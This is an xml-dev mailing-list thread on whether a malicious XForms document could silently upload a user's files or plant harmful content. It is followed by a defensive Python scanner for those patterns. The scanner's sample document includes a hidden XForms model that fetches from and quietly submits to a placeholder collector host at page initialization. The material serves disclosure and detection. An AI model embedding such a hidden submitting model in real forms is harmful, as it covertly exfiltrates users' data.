
Re: XForms - Secure or Insecure?

xforms upload
> 1. That a malicious XForms-containing document can upload files from a
> user's computer without their knowledge

(thinking outside the box here)
It seems to me that this *could* involve digital rights - that is, the
issue can be approached from the file perspective rather than the XForms
perspective.  Initiatives such as the OASIS Rights Language TC [1] and
the W3C Open Digital Rights Language (ODRL[2]) come to mind. However,
this would require access control policies for the XForms-containing
document (thinking of it almost as a "user") - which may be out of scope
of the issue.

Kind Regards,
Joe Chiusano
Booz | Allen | Hamilton

[1] http://www.oasis-open.org/committees/rights/
[2] http://www.w3.org/TR/odrl/

AndrewWatt2000@a... wrote:
> [I posted this primarily to XForms lists but if anyone among those on XML-Dev
> who is interested in XForms has thought about this issue, any informed
> feedback would be welcome. Thanks. ]
> I thought it would be useful ... hopefully in the sense of eliciting
> well-founded reassurance .. to raise a couple of security questions that I
> have regarding XForms.
> There are two potential sources of security concern:
> 1. That a malicious XForms-containing document can upload files from a user's
> computer without their knowledge
> 2. A malicious XForms-containing document could download a virus or other
> nasty to the user's computer.
> Let me explain how these undesirable situations might potentially arise.
> The general background is that an XForms-containing document may have more
> than one XForms model. The security concerns that I am raising could be
> hidden in one XForms model while another XForms model produces the
> functionality that the user wants or needs.
> 1. File Upload - In principle it seems possible as the Candidate
> Recommendation is drafted that a file could be uploaded from the user's
> computer in response to any arbitrary event. For example the file could be
> uploaded as soon as the XForms completes initialization. One scenario is that
> the content of the file in question is loaded into an <xforms:instance> and
> is later "submitted" to an arbitrary URL chosen by the author of the
> malicious code. If the XForms author sets the replace attribute on
> <xforms:submission> to a value of "none", the user may have no knowledge that
> the file has been "stolen" from their computer.
> 2. Virus Implantation - In principle a hidden XForms model could obtain its
> instance data from an arbitrary URL, with no indication that malicious code
> has been downloaded into the instance data, using the src attribute on
> <xforms:instance>. As with scenario 1, an arbitrary event could be used to
> "submit" i.e. save the malicious code to the user's computer using a file
> URL.
> Given that an XForms-containing document could contain more than two XForms
> models, then a combined upload/virus implantation attack would be
> theoretically possible.
> I assume that the intent of the WG is that XForms implementers provide some
> form (pun intended) of sandbox to prevent such malicious practices. However,
> the current CR seems to rely largely on implementers' common sense ... a
> dangerous commodity where security is concerned ... rather than provide a
> detailed consideration of the risks (perhaps only simply to dismiss them?)
> and solution for these potential security concerns.
> I would welcome comments on whether the scenarios which I describe are
> realistic and, assuming that, on what the most appropriate way(s) forward are
> to ensure that XForms-containing documents cannot be used for malicious
> purposes.
> If XForms is to be accepted as an appropriate vehicle for handling valuable
> and sensitive business data, it is critical that there is well-founded
> confidence in the security provided by XForms implementations.
> Andrew Watt
> -----------------------------------------------------------------
> The xml-dev list is sponsored by XML.org <http://www.xml.org>, an
> initiative of OASIS <http://www.oasis-open.org>
> The list archives are at http://lists.xml.org/archives/xml-dev/
> To subscribe or unsubscribe from this list use the subscription
> manager: <http://lists.xml.org/ob/adm.pl>
Joseph M. Chiusano
Senior Consultant
Booz | Allen | Hamilton, IT Digital Strategies Team
8283 Greensboro Drive, McLean, VA 22012
tel (work): (703) 902-6923
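The two scenarios in Andrew Watt's post turn on a handful of markup features that are visible in the document itself: an <xforms:instance> whose src points outside the document, an <xforms:submission> whose action is an arbitrary or file: URL and whose replace attribute is "none", and an <xforms:send> fired from an initialization event rather than from a control the user activates. A recipient or gateway can therefore check for those combinations before an XForms processor ever runs the document. The following Python is an added example written for this page, not code from the thread or from any XForms implementation; the check_xforms function, the SAMPLE_DOC document and the host name hidden-collector.example are constructed for illustration, and the set of initialization events assumes the XForms 1.0 event names.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

XF = "{http://www.w3.org/2002/xforms}"       # XForms namespace
EV = "{http://www.w3.org/2001/xml-events}"   # XML Events namespace (ev:event)

# Initialization events that fire with no user interaction (XForms 1.0 names).
AUTO_EVENTS = {"xforms-model-construct", "xforms-model-construct-done", "xforms-ready"}


def _scheme_and_host(url):
    parsed = urlparse(url)
    return parsed.scheme.lower(), parsed.hostname


def _trigger_event(elem, parent_of):
    """Nearest ev:event attribute on the element itself or an enclosing action."""
    node = elem
    while node is not None:
        event = node.get(EV + "event")
        if event:
            return event
        node = parent_of.get(node)
    return None


def check_xforms(doc_xml, trusted_hosts=()):
    """Return (model_id, finding) tuples for the risky patterns in doc_xml.

    trusted_hosts: hostnames the document may fetch instance data from and submit to.
    """
    root = ET.fromstring(doc_xml)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings = []
    model_of_submission = {}  # submission id -> model id, to attribute <xforms:send>

    for model in root.iter(XF + "model"):
        mid = model.get("id", "(no id)")

        # Instance data pulled from outside the document (scenario 2).
        for inst in model.findall(XF + "instance"):
            src = inst.get("src")
            if not src:
                continue
            scheme, host = _scheme_and_host(src)
            if scheme == "file":
                findings.append((mid, f"instance reads a local file: {src}"))
            elif host and host not in trusted_hosts:
                findings.append((mid, f"instance fetched from untrusted host: {src}"))

        # Where each submission delivers the instance, and whether the user sees it.
        for sub in model.findall(XF + "submission"):
            sid = sub.get("id", "(no id)")
            model_of_submission[sid] = mid
            scheme, host = _scheme_and_host(sub.get("action", ""))
            if scheme == "file":
                findings.append((mid, f"submission '{sid}' writes to a file: URL"))
            elif host and host not in trusted_hosts:
                findings.append((mid, f"submission '{sid}' sends data to untrusted host {host}"))
            if sub.get("replace") == "none":
                findings.append((mid, f"submission '{sid}' uses replace='none', so nothing is shown"))

    # Submissions fired by initialization events rather than by a user control.
    for send in root.iter(XF + "send"):
        event = _trigger_event(send, parent_of)
        if event in AUTO_EVENTS:
            sid = send.get("submission", "(no id)")
            mid = model_of_submission.get(sid, "(unknown model)")
            findings.append((mid, f"submission '{sid}' is sent automatically on {event}"))
    return findings


# Constructed sample: the model the user expects, plus a second model of the
# kind the thread describes that the visible form never references.
SAMPLE_DOC = """<html xmlns="http://www.w3.org/1999/xhtml"
      xmlns:xforms="http://www.w3.org/2002/xforms"
      xmlns:ev="http://www.w3.org/2001/xml-events">
  <head>
    <xforms:model id="order">
      <xforms:instance><data xmlns=""><item/></data></xforms:instance>
      <xforms:submission id="place-order" method="post" action="order.cgi"/>
    </xforms:model>
    <xforms:model id="hidden">
      <xforms:instance src="https://hidden-collector.example/payload.xml"/>
      <xforms:submission id="drop" method="post" replace="none"
                         action="https://hidden-collector.example/collect"/>
      <xforms:action ev:event="xforms-ready">
        <xforms:send submission="drop"/>
      </xforms:action>
    </xforms:model>
  </head>
  <body>
    <xforms:trigger model="order">
      <xforms:label>Place order</xforms:label>
      <xforms:send ev:event="DOMActivate" submission="place-order"/>
    </xforms:trigger>
  </body>
</html>"""

if __name__ == "__main__":
    for model_id, finding in check_xforms(SAMPLE_DOC):
        print(f"[{model_id}] {finding}")
```

Run as a script it lists the findings for the constructed sample, all of them against the "hidden" model and none against "order". In practice trusted_hosts would carry the document's own origin, so that a form posting back to where it came from is quiet while a second model that fetches from or submits to somewhere else, silently and at initialization, is the case the thread is worried about.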
